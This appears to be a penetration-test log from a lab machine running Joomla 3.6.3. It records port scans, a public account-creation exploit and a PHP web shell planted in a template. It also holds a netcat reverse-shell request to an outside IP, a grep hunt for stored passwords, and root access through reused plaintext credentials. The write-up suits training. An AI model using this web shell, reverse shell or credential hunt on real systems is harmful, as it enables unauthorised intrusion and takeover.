CMS01
๐งช Pentest Log: {{date:2025-08-27}}
๐ Target Information
- Machine Name: CMS01
- IP Address: 10.11.1.177
- Operating System: Linux
ip=10.11.1.177
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Joomla 3.6.3 Test Site
Google for exploit, found
https://www.exploit-db.com/exploits/40637
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/XiphosResearch/exploits/blob/master/Joomraa/joomraa.py
python3 exploit.py -u hacker -p password -e hacker@example.com http://$ip
Login with
hacker:password
Found administrator password under note
administrator:joomlaadministrator
Login administrator account and change the template page, add a shell.php page
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
http://10.11.1.177/templates/protostar/shell.php?cmd=busybox%20nc%20172.16.1.1%2080%20-e%20/bin/bash
๐งฌ Privilege Escalation
๐ค Current Access
- User: apache
- Groups: 48(apache)
- Shell Type: reverse shell
๐ Enumeration
Credential Find:
find -type f -exec grep -lir "password =" {} \;
found
./configuration.php
public $user = 'root';
public $password = 'root1988';
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Password Reuse
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Smash to root
ssh -oHostKeyAlgorithms=+ssh-rsa root@$ip
- Key File
cvxdxsy3cjhhbk0zbfuf